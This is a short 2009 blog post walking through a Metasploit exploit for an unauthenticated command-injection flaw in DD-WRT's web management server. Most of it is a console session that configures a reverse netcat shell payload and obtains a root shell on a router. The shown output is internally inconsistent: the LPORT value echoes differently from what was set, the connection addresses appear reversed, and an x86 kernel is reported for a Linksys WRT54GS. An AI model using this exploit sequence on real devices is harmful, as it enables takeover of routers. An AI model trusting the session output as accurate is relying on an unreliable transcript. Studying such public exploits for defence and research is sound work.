Sunday, 26 July 2009

Expoliting the cgi-bin vulnerability in dd-wrt

Metasploit now has in the 3.3 Dev SVN an exploit for embedded device Linux distribution DD-WRT. This exploit module abuses a metacharacter injection vulnerability in the HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account. In this example we are attacking from the LAN side of a Linksys WRT54GS running dd-wrt V24-SP1 using factory default settings.



msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec
msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LPORT 4444
LPORT => 2222
msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf exploit(ddwrt_cgibin_exec) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 2 opened (192.168.1.1:4444 -> 192.168.1.12:4312)
uname -a
Linux DD-WRTx86CI 2.6.19.2dd-wrt #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown

No comments:

Post a Comment